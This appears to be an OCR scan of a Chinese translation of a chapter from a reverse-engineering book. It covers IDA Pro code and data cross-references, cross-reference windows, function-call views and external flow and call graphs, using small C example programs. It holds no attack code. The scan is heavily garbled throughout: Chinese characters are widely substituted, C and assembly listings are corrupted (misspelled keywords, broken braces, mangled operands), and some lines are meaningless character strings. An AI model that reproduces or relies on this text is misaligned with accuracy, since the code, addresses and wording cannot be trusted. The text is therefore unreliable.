在 深入 讨论 交叉 引用 之 前 ， 先 来 了 解 IDA 如 何在 反 汇 编 代 人 码 清单 中 显示 交叉 引用 信息 。 某 
äm (sub 401000) 的 标题 行 如 图 9-2 所 示 。 该 函数 的 常规 注释 (图 右 侧 ) 中 包含 一 个 交 
OI, 






























.text:00401000 ; Attributes: bp-based frame 

.text:00401000 

.text:00401000 sub 401000 proc near ; CODE XREF: main+2AĻp 
.text: 00401000 





图 9-2 ”基本 的 交叉 引用 


文本 CODE XREF 表示 这 是 一 个 代码 交叉 引用 ， 而 非 数 据 交 又 引用 (DATA XREF )。 后 面 的 地 址 
(这 里 为 main+2A ) 是 交叉 引用 的 源头 地 址 。 注 间 ， 这 个 地 址 比 .text:0040154A 之 类 的 地 址 更 具 
描述 性 。 虽 然 这 里 的 两 个 地 址 都 可 以 表示 同一 个 程序 位 置 , 但 交叉 引用 中 使 用 的 地 址 提供 了 额外 
的 信息 ， 指 出 交叉 引用 是 在 一 个 名 为 main 的 函数 中 提出 的 ， 具 体 而 言 是 main 函数 中 的 第 0x2A 
(42) 字 玫 。 地 址 后 面 总 是 有 一 个 上 行 或 下 行 般 头 ， 表 示 引 用 位 置 的 相对 方向 。 在 网 9-2 P, F 
行 殴 头 表示 main*2A 的 地 址 比 sub 401000 要 高 ， 因 此 ， 你 需要 问 下 滚动 才能 到 达 该 地 址 。 同 样 ， 
上 行 箭 头 表示 引用 地 址 是 一 个 较 低 的 内 存 地 址 ,你 需要 加 上 滚动 才能 到 达 。 最 后 ， 每 个 交叉 引用 
注释 都 包含 一 个 单字 符 后 级 ， 用 以 说 明 交 叉 引 用 的 类 型 。 我 们 将 在 后 面 讨 论 IDA 中 的 各 类 交叉 
引用 时 介绍 这 些 后 组 。 









































9.1.1 代码 交叉 引用 


代码 交叉 引用 用 于 表示 一 条 指令 将 控制 权 转 交 给 男 一 条 指令 。 在 IDA 中 ， 指 令 转 交 欣 制 权 
的 方式 叫做 流 (flow )。IDA 中 有 3 种 基本 流 : 首 通 流 、 跳 转 流 和 调用 流 。 根 据 目 标 地 址 是 近 地 
址 还 是 远 地 址 ， 跳 转 流 和 调用 流 还 可 以 进一步 细 分 。 只 有 在 使 用 分 段 地 址 的 二 进 制 文件 中 ,你 才 
会 遇 到 远 地 址 。 在 接 下 来 的 讨论 中 ， 我 们 使 用 以 下 程序 的 反 汇 编 版 本 : 
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int read 1t; //integer variable read in main 
int write it; //integer variable written 3 times in main 
ant ref it; //integer variable whose address is taken in main 
void callflow() {} //function called twice from main 
int main() { 
int *p = &ref it; //results in an "offset" style data reference 
*p = read it; //xesults in a "read" style data reference 
write it - *p; //xesults in a "write" style data reference 
callflow(); //xesults in a "call" style code reference 
if (read it == 3) { //results in "jump" style code reference 
write it = 2; //results in a "write" style data reference 
j 
else { //xesults in an "jump" style code reference 
write it - 1; //xesults in a "write" style data reference 
callflow(); //xesults in an "call" style code reference 
j 








根据 注释 文本 的 描述 ， 这 个 程序 包含 了 IDA 中 体现 所 有 交叉 引用 特性 的 操作 。 

首 通 流 (ordinary flow ) 是 一 种 最 简单 的 流 ， 它 表示 由 一 条 指令 到 另 一 条 指令 的 顺序 流 。 这 
是 所 有 非 分 文 指令 〈 如 ADD) 的 殉 认 执行 流 。 除 了 指令 在 反 汇 编 代 码 清单 中 的 显示 有 顺序 外 ， 正 稼 
流 没 有 其 他 特殊 的 显示 标志 。 如 朱 指 令 A 有 一 个 指 癌 指 令 B 的 普通 流 ， 那 么 ， 在 反 汇 编 代 码 清 
Hh, S B 会 紧 跟 在 指令 A 后 面 显示 。 在 代码 清单 9-1 中 ， 除 @@、 思 两 处 的 指令 外 ， 其 他 每 一 
条 指令 都 有 一 个 普通 流 指 向 紧 跟 在 它们 后 面 的 指令 。 


代码 清单 9-1 交叉 引用 源 和 目标 

















.text:00401010 main proc near 

. text :00401010 

.text:00401010 p - dword ptr -4 

. text :00401010 

.text:00401010 push ebp 
.text:00401011 mov ebp, esp 

. text :00401013 push ecx 

. text :00401014 Omov [ebprp], offset ref it 
. text: 0040101B mov eax, [ebp«p] 

. text :0040101E @mov ecx, read it 

. text : 00401024 mov [eax], ecx 

. text :00401026 mov edx, [ebp+p] 

. text : 00401029 mov eax, [edx] 

. text :0040102B Gmov write it, eax 

. text :00401030 ecall callflow 

. text :00401035 ecmp read it, 3 

. text :0040103C jnz short loc 40104A 
. text :0040103E Gmov Write 10, 2 

. text : 00401048 6 jmp short loc 401054 


© .text:0040104A ; -------------- 
. text :0040104A 
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.text:0040104A loc 40104A: 

. text :0040104A Gmov 
. text : 00401054 

.text:00401054 loc 401054: 


6; CODE XREF: main+2C 个 j 
write it, 1 


@; CODE XREF: main+38 个 j 


. text :00401054 ecall callflow 
. text : 00401059 XOr eax, eax 
. text :0040105B mov esp, ebp 
. text :0040105D pop ebp 

. text:0040105E Oretn 
.text:0040105E main endp 


HA HIT RIBERA, "Ie PR x86 call 指令 ， 它 分 配 到 一 个 调用 流 (call flow )， 表示 控制 权 
被 转交 给 目标 因数 。 多 数 情 况 下 ,call] 指令 也 分 配 到 一 个 普通 流 , 因为 大 多 数 函 数 会 返回 到 call 
之 后 的 位 置 。 如 果 IDA 认为 某 个 图 数 并 不 返回 〈 在 分 析 阶 段 确定 )， 那么 ,在 调用 该 函数 时 ， 它 
就 不 会 为 该 图 数 分 配 普通 流 。 调 用 流通 过 在 目标 呆 数 〈 流 的 目的 地 址 ) 处 显示 交叉 引用 来 表示 。 
callflow 国 数 的 反 汇 编 代 码 清 单 如 下 所 示 : 











.text :00401000 callflow proc near ; CODE XREF: main«20V/p 
. text : 00401000 ; main:loc 401054N/p 

. text :00401000 push ebp 

. text :00401001 mov ebp, esp 

. text :00401003 pop ebp 

. text :00401004 retn 

.text:00401004 callflow endp 








在 这 个 例子 中 ，callflow 所 在 的 位 置 显示 了 两 个 交叉 引用 ,表示 这 个 函数 被 调 用 了 两 次 。 除 
韭 调用 地 址 有 相应 的 名 称 ， 否则 ， 交 又 引用 中 的 地 址 会 以 调用 子 数 中 的 偏 移 量 表示 。 这 里 的 交叉 
引用 分 别 用 到 了 上述 两 种 地 址 。 由 郴 数 调用 导致 的 交叉 引用 使 用 后 缀 p 看 做 是 Procedure )。 

每 个 无 条 件 分 支 指令 和 条 件 分 支 指 令 将 分 配 到 一 个 跳 转 流 (jump flow )。 条 件 分 文 还 分 配 到 
普通 流 ， 以 在 不 进入 分 文 时 对 流 进 行 控 制 。 无 条 件 分 文 并 没有 相关 的 普通 流 , 因为 它 总 会 进入 分 
文 。@ 处 的 虚线 表示 相 邻 的 两 条 指令 之 间 并 不 存在 普通 流 。 跳 转 流 与 跳 转 目标 位 置 显示 的 跳 转 陈 
交叉 引用 有 关 , 如 @ 处 所 示 。 与 调用 式 交 叉 引 用 一 样 ,， 跳 转交 叉 引 用 显示 引用 位 置 ( 跳 苇 的 源头 ) 
的 地 址 。 跳 转交 又 引用 使 用 后 级 j ( 看 做 是 Jump )。 

9.1.2 数据 交叉 引用 

数据 交叉 引用 用 于 跟 踊 二 进 制 文件 访问 数据 的 方式 。 数 据 交 又 引用 与 IDA 数据 库 中 任何 礁 
涉 到 虚拟 地 址 的 字 节 有 关 【〈 换 言 之 ， 数 据 交 叉 引 用 与 栈 变量 亩 无 天 系 )。IDA 中 最 第 用 的 3 种 数 
据 交 又 引 用 分 别 用 于 表示 某 个 位 置 何 时 被 读 取 、 何 时 被 写 入 以 及 何 时 被 引用 。 下 面 是 与 前 一 个 示 
例 程序 有 关 的 全 局 变量 ， 其 中 包含 几 个 数据 交叉 引用 。 













































































.data:0040B720 read it dd ? 


.data:0040B720 
.data:0040B724 write it 
.data:0040B724 


; DATA XREF: main+E 个 rr 
; main*25/hr 


dd ? ; DATA XREF: main+1B 个 Ww 


©; main+2E 个 w ... 
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.data:0040B728 ref it db  ?; ; DATA XREF: _main+4 个 o 
.data:0040B729 db Lab 
.data:0040B72A db E 
.data:0040B72B db 3 


读 取 交叉 引用 (read cross-reference ) 表示 访问 的 是 某 个 内 存 位 置 的 内 容 。 读 取 交 叉 引 用 可 能 
仪 仪 源 目 于 某 个 指令 地 址 ， 但 也 可 能 引用 任何 程序 位 置 。 在 代码 清单 9-1 中 ， 全 局 变量 read it 
在 @@ 处 被 谈 取 。 根 据 上 面 代码 中 显示 的 相关 交叉 引用 注释 ， 我 们 可 以 知道 main 中 有 哪些 位 置 引 
用 了 read 让 。 根 据 后 缀 rr， 可 以 确定 这 是 一 个 谈 取 交叉 引用 。 对 read it 的 第 一 次 谈 取 是 ECX 
寄存 天 中 的 32 位 读 取 ， 它 使 IDA 将 read 让 格 式 化 成 一 个 双 字 。 通 名，IDA 会 收集 尽 可 能 多 的 
线索 ， 根 据 程序 访问 变量 的 方式 ， 以 及 函数 如 何 将 变量 用 作 上 自己 的 参数 ， 以 确定 变量 的 大 小 和 / 
或 类 型 。 

在 代码 清单 9-1 中 , 全 局 变量 write 让 在 @@ 处 被 引用 。IDA 生成 的 相关 写 入 交 双 引用 (write 
cross-reference ) 作为 变量 write it 的 注释 显示 ， 其 中 指出 了 修改 变量 内 容 的 程序 位 置 。 写 入 交 
又 引用 使 用 后 缀 wo 同样 , 在 这 里 , IDA 根据 32 位 的 EAX 寄存 带 被 复制 到 write it 中 这 一 事实 ， 
确定 了 这 个 变量 的 大 小 。 值得 注意 的 是 , weite it 位 置 显示 的 交叉 引用 以 省 略 号 四 处 结束 ， 表 明 
对 write it 的 交叉 引用 数量 超出 了 当前 的 交叉 引用 显示 限制 。 你 可 以 通过 Options 》 General 对 话 
框 中 Cross-references 选项 卡 中 的 Number of displayed xrefs ( 显示 的 交叉 引用 数量 ) 设置 修改 这 个 
限制 。 和 旋 取 交叉 引用 一 样 ， 写 人 交叉 引用 可 能 仅仅 源 目 于 一 条 程序 指令 , 但 也 可 能 引用 任何 程 
序 位置 。 一 般 而 言 ， 以 一 个 程序 指令 字 和 为 目标 的 写 人 交叉 引用 表示 这 是 一 段 目 修改 代码 ， 这 种 
代码 通 稼 被 视 为 无 效 代 码 ， 在 恶意 软件 使 用 的 “去 模糊 例 程 ”( de-obfuscation routine ) 中 经 常 可 
以 发 现 这 类 代码 。 

第 三 类 数据 交叉 引用 为 偏 移 量 交 又 引用 (offset cross-reference ), 它 表示 引用 的 是 某 个 位 置 的 
地 址 (而 非 内 容 )。 在 代码 清单 9-1 中 ， 全 局 变量 ref it 的 地 址 在 处 被 引用 ， 因 此 ， 在 上 面 的 
代码 中 ，ref_it 所 在 的 位 置 显 示 了 偏 移 量 交叉 引用 SAN o) 的 注释 。 通 第 ,代码 或 数据 中 的 
指针 操作 会 导致 偏 移 量 交 又 引用 。 例如 , 数组 访问 操作 一 般 通 过 在 数组 的 起 始 地 址 上 加 上 一 个 偶 
移 量 来 实现 。 因 此 ,许多 全 局 数组 的 第 一 个 地 址 通常 可 以 由 偏 移 量 交 又 引用 来 确定 。 为 此 ,许多 
字符 串 数据 (在 C/C++ 中 ， 和 字符 串 作 为 学 符 数 组 ) 成 为 侦 移 量 交 叉 引 用 的 目标 。 

与 仅 源 目 于 指令 位 置 的 谈 取 和 写 人 交叉 引用 不 同 , 偏 移 量 交 义 引用 可 能 源 于 指令 位 置 或 数据 
位 置 。 例如， 如 采 一 个 指针 表 ( 如 虚 表 ) 从 表 中 的 每 个 位 置 品 这 些 位 置 指 癌 的 地 方 生成 一 个 仿 移 
量 交 又 引用 ， 则 这 种 偏 移 量 交 又 引用 就 属于 源 于 程序 数据 部 分 的 交叉 引用。 分 析 第 8 草 中 类 
SubClass 的 虚 表 ， 就 可 以 发 现 这 一 点 ， 它 的 反 汇 编 代 码 清单 如 下 所 示 : 














































































































.rdata:00408148 off 408148 dd offset SubClass::vfunci(void) ; DATA XREF: SubClass::SubClass(void)+12 个 o 


.rdata:0040814C dd offset BaseClass::vfunc2(void) 
.Ydata:00408150 dd offset SubClass::vfunc3(void) 
.rdata:00408154 dd offset BaseClass::vfunc4(void) 


.rdata:00408158 dd offset SubClass::vfunc5(void) 
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可 以 看 到 ， 类 构造 图 数 SubClass:: SubClass(void) fi FH T EREE, PRX SubClass:: 
vfunc3(void) 的 标题 行 如 下 所 示 ， 显 示 了 连接 该 函数 与 虚 表 的 偏 移 量 交 义 引用 。 








.text:00401080 public: virtual void thiscall SubClass::vfunc3(void) proc near 
.text:00401080 ; DATA XREF: .rdata:00408150Yo 








这 个 例子 证 实 了 C++ 虚 函 数 的 一 个 特 操 , 结合 仿 移 量 交 叉 引 用 来 考查 , 这 个 特点 显得 尤为 明 
A. B C++ 虚 函 数 绝 不 会 被 下 接 引 用 ,也 绝 不 应 成 为 调用 交叉 引用 的 目标 。 所 有 Ca Rz BRUM FH 
至 少 一 个 虚 表 条 目 引 用 ,并 且 始 终 是 至 少 一 个 俩 移 量 交 叉 引 用 的 目标 。 需 要 记 住 的 是 ， 你 不 一 定 
rm 2b HR rem. DI. mg 章 所 述 ， 一 个 虚 困 数 可 以 出 现在 多 个 虚 表 中 。 最 后 ， 回 调 仙 
移 量 交 义 引用 是 一 种 有 用 的 技术 ， 可 迅速 在 程序 的 数据 部 分 定位 CHER o 
































9.1.3 交叉 引用 列表 





介绍 了 交叉 引用 的 定义 后 ， 现 在 开始 讨论 如 何 访问 IDA 中 的 所 有 交叉 引用 数据 。 如 前 所 述 ， 
在 某 个 位 置 显 示 的 交叉 引用 注释 的 数量 由 一 个 配置 控制 ， 其 默认 设置 为 2。 只 要 一 个 位 置 的 交叉 
引用 数量 不 超出 这 个 限制 ,你 就 可 以 相当 直接 地 访问 这 些 交 义 引 用 。 将 光标 悬 停 在 交叉 引用 文本 
E, IDA 将 在 一 个 类 似 于 工具 提示 的 窗口 中 显示 交叉 引用 源头 部 分 的 反 汇 编 代码 清 单 。 双 击 交 又 
引用 地 址 ， 反 汇编 窗口 将 跳 转 到 交叉 引用 的 源 位 置 。 

你 可 以 通过 两 种 方法 查看 某 个 位 置 的 交叉 引用 完整 列表 。 第 一 种 方法 是 打开 与 某 一 特定 位 置 
有 关 的 交叉 引用 子 窗 口 。 将 光标 放 在 一 个 或 多 个 交叉 引用 的 目标 地 址 上 ， 并 选择 View » Open 
Subviews » Cross-References ( 查看 ”打开 子 窗 口 交叉 引用 )， 即 可 打开 指定 位 置 的 交叉 引用 完 
整 列 表 ， 如 图 9-3 所 示 ， 其 中 显示 了 变量 write it 的 交叉 引用 完整 列表 。 



































xrefs to write it EI 





mow write_it, eax 







| | main-c2F mov write it, 2 
| | mainloc 401044 mov write it, 1 


Line 1of3 











图 9-3 交叉 引用 显示 和 窗口 








窗口 中 的 每 列 分别 表 示 交 叉 引 用 源头 的 方 同 (向 上 或 加 下 入 交叉 引用 的 类 型 〈 基 于 前 面 讨 
论 的 类 型 后 级 入 区 义 引 用 的 源 地 址 以 及 源 地 址 处 显示 的 对 应 反 汇 编 文本 ， 包 括 注 释 。 和 其 他 显 
示 地 址 列表 的 窗口 一 样 ， 双 击 窗 口中 的 任何 条 目 , 反 汇 编 窗口 将 跳 转 到 对 应 的 源 地 址 。 交 又 引 用 
窗口 一 旦 打开 , 将 会 始终 显示 , 你 可 以 通过 反 汇 编 代码 清单 工作 区 上 方 的 一 个 标题 标签 ( 与 其 他 
打开 的 子 窗 口 的 标题 标签 一 起 显示 ) 访问 这 个 窗口 。 

第 二 种 访问 交叉 引用 列表 的 方法 是 突出 显示 一 个 你 感 兴趣 的 名 称 ， 在 沫 单 中 选择 
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Jump » Jump to xref ( 使 用 热 键 CTRL+X ) 打开 一 个 对 话 框 ， 其 中 列 出 了 引用 选中 符号 的 每 个 位 
置 ,最 终 的 对 话 框 如 图 9-4 所 示 , 该 对 话 框 在 外 观 上 与 图 9-3 中 的 交叉 引用 子 窗 口 几乎 一 模 一 样 。 
选中 write it 的 第 一 个 实例 ( .text:0040102B ) 并 使 用 热 键 CTRL+X， 即 可 打开 图 9-4 中 的 对 
WME o 








[E xrefs to write it l 





merce pr 
| kel Up w _main+2E mov write it, 2 
| | main:loc 40104A mov write it, 1 







Cancel | Search | Help | 


Line 1of3 E 





图 9-4” 跳 转 到 交叉 引用 对 话 框 


图 9-3 中 的 子 窗口 与 图 9-4 中 的 对 话 框 之 间 的 区 别 主要 表现 在 行为 方面 。 图 9-4 显示 的 对 话 
框 是 一 个 模式 ”对话 框 ( modal dialog )， 它 提供 了 用 于 交互 和 关闭 对 话 框 的 按钮 。 这 个 对 话 框 的 
主要 用 途 是 选择 一 个 引用 位 置 , 并 跳 转 到 该 位 置 。 双击 其 中 列 出 的 一 个 位 置 , 对 话 框 会 立即 关闭 ， 
同时 反 汇 编 窗口 将 跳 转 到 你 选择 的 位 置 。 对 话 框 与 交叉 引用 子 窗口 之 间 的 第 二 个 区 别 在 于 前 者 可 
以 通过 选择 任何 符号 并 使 用 热 键 或 上 下 文 菜 单打 开 , 而 后 者 只 能 通过 将 光标 放 在 一 个 交叉 引用 目 
标 地 址 上， 然后 选择 View >» Open Subviews > Cross-References 打开 。 换 句 话 说 ， 对 话 框 可 以 在 任 
何 交 叉 引 用 的 源 位 置 打 开 ， 而 子 窗口 只 能 在 交 义 引用 的 目标 位 置 打开 。 

交叉 引用 列表 可 用 于 迅速 确定 调用 某 个 特殊 函数 的 位 置 。 许 多 人 认为 使 用 C stropy? PAR 
和 危险。 如 果 使 用 交叉 引用 ， 定 位 每 一 个 strcpy 调用 和 查找 任何 一 个 strcpy 调用 一 样 简单 ， 你 只 
需 使 用 热 键 CTRL+X 打开 交叉 引用 对 话 框 ， 并 训 览 其 中 的 每 一 个 调用 交叉 引用 即 可 。 如 有 果 你 不 
想 花 时 间 碍 找 二 进 制 文件 所 使 用 的 stropy 函数 ， 你 甚至 可 以 添加 一 段 包含 strepy 文本 的 注释 ， 
并 使 用 该 注释 ”激活 “交叉 引用 ”对 话 框 。 









































9.1.4 函数 调用 


有 一 种 交叉 引用 列表 专门 处 理 函 数 调 用 ， 选 择 View k Open Subviews » Function Calls 即 可 打 
开 该 窗口 。 图 9-5 所 示 为 结果 对 话 框 ， 窗 口 的 上 半 部 分 列 出 了 所 有 调用 当前 国 数 (由 打开 窗口 时 














CD 在 继续 与 基础 应 用 程序 进行 正常 交互 之 前 ， 你 必须 关闭 模式 对 话 框 。 在 继续 与 应 用 程序 正常 交互 时 ,你 可 以 始终 
打开 非 模 式 对 话 框 。 

(2) C strcpy 函数 将 一 个 源 字符 数组 ( 包括 相关 的 空 终止 符 ) 复制 到 一 个 目标 数组 中 ， 而 不 检查 目标 数组 是 否 拥有 足 
够 的 空间 可 以 容纳 源 数 组 中 的 所 有 字符 。 

O 如果 一 个 符号 名 称 出 现在 注释 中 ，IDA 会 将 这 个 符号 作为 反 汇编 指令 中 的 一 个 操作 数 处 理 。 双 击 该 符号 ， 反 汇编 
窗口 将 跳 转 到 相应 位 置 。 同 时 ， 庙 击 该 符号 ， 将 显示 上 下 文 菜单 。 
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光标 所 在 位 置 决定 ) 的 位 置 ， 窗 口 的 下 半 部 分 列 出 了 当前 函数 做 出 的 全 部 调用 。 








Address Called function 
1].text:0040 1030 call callflow 


.text:00401054 ^ call callflow 





图 9-5 KOH fs oO 
同样 ,使 用 窗口 中 列 出 的 交叉 引用 ,可 以 迅速 将 反 汇 编 代 人 码 清单 定位 到 对 应 的 交叉 引用 位 置 。 
如 采 仅 仅 考 碍 图 数 调用 交叉 引用 , 我 们 将 能 够 更 多 地 考虑 函数 之 间 的 抽象 关系 ,而 不 只 是 一 个 地 
址 与 男 一 个 地 址 之 间 的 对 应 关系 。 在 下 一 市 中 ， 我 们 将 讨论 如 何 通 过 IDA 提供 的 各 种 帮助 你 解 
释 二 进 制 文件 的 图 形 ， 利 用 这 种 抽象 关系 。 


9.2 IDA 绘图 


因为 交叉 引用 反映 的 是 地 址 之 间 的 关系 ， 因 此 ， 告 想 要 描绘 二 进 制 文件 的 图 形 ,它们 目 然 就 
成 为 我 们 的 起 点 。 特 定 于 某 些 类 型 的 交叉 引用 , 我 们 可 以 绘制 大 量 有 用 的 图 形 ， 用 于 分 析 二 进 制 
文件 。 初 学 者 可 以 把 交叉 引用 看 成 是 图 形 中 的 边 ( 连接 各 点 的 线 )。 根 据 我 们 希望 生成 的 图 形 的 
类 型 ， 节 点 (图 形 中 的 点 ) 可 以 是 各 指令 、 称 为 基本 块 ( basic block ) 的 指令 组 或 者 是 整个 函数 。 
IDA 提供 两 种 独特 的 绘图 功能 : 利用 捆绑 绘图 应 用 程序 的 遗留 绘图 功能 ， 以 及 集成 的 交互 式 绘图 
功能 。 我 们 将 在 下 面 几 节 中 介绍 这 两 种 绘图 功能 。 


9.2.1 IDA 外 部 《第 三 方 ) 图 形 


IDA 的 外 部 图 形 功 能 采用 第 三 方 图 形 应 用 程序 来 显示 IDA 生成 的 图 形 文件 。IDA 6.1 之 前 的 
Windows 版 本 自 带 一 个 名 为 wingraph32 的 捆绑 图 形 应 用 程序 。IDA 6.0 的 非 Windows 版 本 可 配 
置 默认 使 用 dottv "Il JESUS. MA IDA .6.1 开始 ， 所 有 IDA 版 本 均 目 带 并 可 配置 使 用 qwingraph? 
KDE UE SS. TAE wingraph32 的 里 平台 Qt 端口 。 虽 然 Linux 用 户 仍然 可 以 看 到 dotty 配置 选项 ， 
但 默认 情况 下 IDA 已 停 用 这 些 选 项 。 通 过 编辑 <IDADIR>/cfg/ida.cfg 中 的 GRAPH. VISUALIZER 
变量 ， 可 配置 DA 使 用 该 图 形 查 看 带 。 

用 户 请 求 外 部 图 形 时 , IDA 会 生成 该 图 形 的 源 文件 并 将 其 保存 到 一 个 临时 文件 内 , 然后 启动 
指定 的 第 三 方 图 形 查 看 需 来 显示 该 图 形 。IDA 支持 两 种 网 形 规范 语言 , 岁 形 描述 语言 (GDL )“ 和 









































(D Hex-Rays 在 以 下 地 址 提供 wingraph32 的 源 文件 : http://www.hex-rays.com/idapro/freefiles/wingraph32 src.zip。 
(2) dotty 是 graphviz 项 目 提供 的 一 个 图 形 查 看 工具 。 

(3) Hex-Rays 在 以 下 地 址 提供 qwingraph 的 源 文件 : http://www.hex-rays.com/idapro/freefiles/qwingraph src.zip。 
由 有 关 GDL 的 参考 信息 ， 人 参见 http://www.absint.com/aisee/manual/windows/node58.html。 


9.2 IDA 绘图 141 


graphviz Ji H f Hj) DOT? 语 言 。 通 过 编辑 <IDADIR>/cfg/ida.cfg 目录 中 的 GRAPH. FORMAT 变量 ， 
可 配置 DA 使 用 图 形 规范 语言 。 此 变量 的 法 定 值 为 DOT 和 GDL. 你 必须 确保 你 在 此 处 指定 的 语言 
与 你 在 GRAPH. VISUALIZER 中 指定 的 查看 器 兼容 。 

使 用 View » Graphs ( 查看 > 图形 ) 子 末 单 可 以 生成 5 种 类 型 的 图 形 。 可 在 IDA 中 使 用 的 外 
部 图 形 包 括 : 

口 KRONIEK; 

口 整个 二 进 制 文件 的 调用 图 ; 

OQ 目标 符号 的 交叉 引用 图 ; 

Q 源头 符号 的 交叉 引用 图 ; 

OQ 目 定 义 的 交叉 引用 网 。 

对 于 其 中 的 流程 图 和 调用 图 ，IDA 能 够 生成 和 保存 GDL (不 是 DOT ) 文件 以 供 IDA 独立 使 
用 。 这 些 选项 可 以 在 File » Produce file ( 文件 ， 生成 文件 ) 子 菜单 中 找到 。 如 果 你 配置 的 图 形 查 
看 从 允许 你 保存 当前 显示 的 图 形 , 则 你 可 以 保存 其 他 类 型 的 图 形 的 规范 文件 。 使 用 外 部 图 形 存 在 
许多 限制 。 第 一 条 也 是 最 重要 的 限制 是 外 部 图 形 并 非 交 互 式 图 形 。 你 所 选择 的 外 部 图 形 查 看 融 的 
功能 决定 了 你 能 够 对 外 部 图 形 所 进行 的 控制 (通常 仅 限 于 缩放 和 平移 )。 
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1. 外 部 流程 图 

将 光标 放 在 一 个 咕 数 中 , 选择 View > Graphs » Flow Chart ( 热 键 为 F12 ), IDA 将 生成 并 显示 
一 个 外 部 流程 图 。 这 种 外 部 流程 图 与 IDA 最 近 引 入 的 集成 式 反 汇编 图 形 视 图 非常 类 似 。 在 入 门 
级 编程 课程 中 ,你 不 会 看 到 这 些 流 程 图 。 将 这 些 图 形 叫 做 控制 流 图 形 也 许 更 为 恰当 ， 因 为 它们 将 
一 个 函数 的 指令 划分 成 基本 块 ， 并 使 用 边 来 表示 块 之 间 的 流 。 














D 参见 http://www.graphviz.org/.; 
(HX DOT 的 参考 信息 ， 人 参见 http://www.graphviz.org/doc/info/lang.html。 
(3) 参见 http://pedram.redhive.com/code/paimei/。 
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图 9-6 是 一 个 相对 简单 的 函数 的 部 分 流程 图 。 如 你 所 见 , 外 部 流程 图 提供 的 地 址 信息 非常 少 ， 
这 使 得 我 们 很 难 将 流程 图 与 其 对 应 的 反 汇 编 代 码 清单 关联 起 来 。 


=Æ WinGraph32 - Graph of sub_401030 -lol x| 
File View zoom Move Help 


&| «exo [| [二 eelas c 














[ebprvar 4], 0 

eax, [ebptarg. 0] 
eax, [ebptarg. 4] 
short loc 401053 









loc. 401053: 
mov eax, [ebprarg. 0] 
add eax ebprarg. 4 










00401043: 
moy ecx, [ebp+arg_0] 











4 
113.33% 0.0) 


5 nodes, 16 edge segments, 1 crossings 


图 9-6 “外 部 流程 图 
从 哺 数 的 入口 点 开始 ， 沿 着 函数 中 第 一 条 指令 的 普通 和 跳 转 流 ， 即 可 生成 流程 图 图 形 。 





2. 外 部 调用 图 

水 数 调用 图 可 帮助 我 们 迅速 理解 程序 中 函数 调用 的 层次 结构 。 首先 为 程序 中 的 每 个 函数 创建 
一 个 图 形 市 点 ,然后 再 根据 函数 之 间 的 调用 交叉 引用 将 函数 节点 连接 起 来 , 即 可 生成 调用 图 。 为 
一 个 函数 生成 调用 图 的 过 程 可 以 看 做 是 一 个 递归 下 降 过 程 , 即 毛 历 该 函数 调用 的 所 有 也 数 。 许多 
时 候 ， 只 要 发 现 库 函数 ， 就 可 以 停止 针对 调用 树 的 递归 下 降 过 程 。 因 为 通过 阅读 与 该 库 晒 数 有 关 
的 文档 , 就 可 以 轻易 得 知 该 库 图 数 的 运行 方式 , 而 不 必 答 试 对 该 困 数 的 反 汇 编 版 本 进行 逆 癌 工程 。 
实际 上 ,对 动态 链接 二 进 制 文件 而 言 ,你 不 可 能 递归 下 降 到 它 的 库 函 数 ， 因 为 动态 链接 二 进 制 文 
件 中 并 没有 这 些 函 数 的 代码 。 为 静态 链接 二 进 制 文件 生成 图 形 也 面临 者 为 一 个 挑战 , 因为 静态 链 
接 二 进 制 文件 中 包含 链接 到 程序 的 所 有 库 的 代码 ， 这 时 生成 的 函数 调用 图 可 能 非常 巨大 。 

为 了 讨论 函数 调用 图 ， 我们 以 下 面 这 个 简单 的 程序 为 例 。 基 本 上 ,这 个 程序 仅仅 创建 了 一 个 
简单 的 函数 调用 层次 结构 : 






































#include «stdio.h» 


void depth 2 1() { 
printf("inside depth 2 _1\n"); 
} 


void depth 2 2() { 
fprintf(stderr, "inside depth 2 2\n"); 
} 


void depth 1() { 
depth 2 1(); 
depth 2 2(); 
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printf("inside depth 1\n"); 


int main() { 
depth 1(); 


使 用 GNU gce 编译 一 个 动态 链接 的 二 进 制 文件 后 ， 可 以 使 用 View » Graphs » Function Calls 
要 求 IDA 生成 一 个 函数 调用 图 ， 从 而 得 到 与 图 9-7 类 似 的 图 形 。 在 这 个 图 形 中 ,我 们 截 去 了 图 形 
的 左 半 部 分 ， 以 提供 更 多 细 方 。 图 中 用 圈 圈 住 的 部 分 是 与 main 函数 有 关 的 调用 图 。 


= WinGraph32 - Call flow of call_tree 
File View Zoom Move Help 
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a ear 23 nodes, 14 edge segments, 0 crossings 
图 9-7 外 部 函数 调用 图 

细心 的 读者 可 能 已 经 留意 到 ,编译 器 分 别 用 puts 和 fwrite 替换 了 printf 和 fprintf ， 因 为 
前 两 个 函数 在 打印 静态 字符 串 时 更 加 高 效 。IDA 利用 不 同 的 颜色 来 表示 图 形 中 不 同类 型 的 节点 ， 

不 过 你 不 能 以 任何 方式 配置 这 些 颜 色 。” 
前 面 的 程序 代码 相当 简单 ,但 为 什么 它 对 应 的 图 形 要 复杂 两 倍 呢 ? 这 是 因为 几乎 所 有 的 编译 矢 
都 会 插入 包装 代码 , 用 于 初始 化 和 终止 库 , 并 在 将 控制 权 转 交 给 main 国 数 之 前 正确 配置 相关 参数 。 
如 果 绘 制 同 一 个 程序 的 静态 链接 版 本 的 因数 调用 网 , 将 得 到 一 幅 一 团 糟 的 图 形 , 如 图 9-8 所 示 。 


zz WinGraph32 - Call fow of call tree s - [BI xl 


File View zoom Move Help 









































E H - 
图 9-8 PATERE K ep ir éi HT d 


图 9-8 iz Y Z BRIDE BS M RE rr, Blei fe Lise NEUE E EG, 以 显示 整 幅 图 形 ， 





(OD 为 了 提高 可 读 性 ， 本 章 中 描述 的 图 形 已 在 IDA 以 外 经 过 编辑 ， 以 删除 节点 颜色 。 
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这 可 能 会 导致 非常 杂乱 的 显示 结 采 。 束 这 幅 特 殊 的 图 形 而 言 ，WinGraph32 窗口 底部 状态 栏 上 的 
显示 表明 ， 图 中 共有 946 个 节点 和 10 125 条 边 ， 将 100 182 个 位 置 彼此 连接 起 来 。 除 了 证 明 毅 态 
链接 库 的 复杂 程度 外 ， 这 个 图 形 根本 有 坚 无 用 处 。 没 有 任何 缩放 和 平移 操作 能 够 简化 这 幅 图 形 ， 而 
日 只 能 通过 读 取 每 个 市 点 的 标签 来 迅速 确定 某 个 限 数 (如 main ) 的 位 置 。 当 你 将 网 形 扩大 到 足以 
读 取 每 个 厄 点 的 标签 时 ， 这 时 窗口 却 只 能 容纳 少数 几 个 市 点 。 

3. 外 部 交叉 引用 

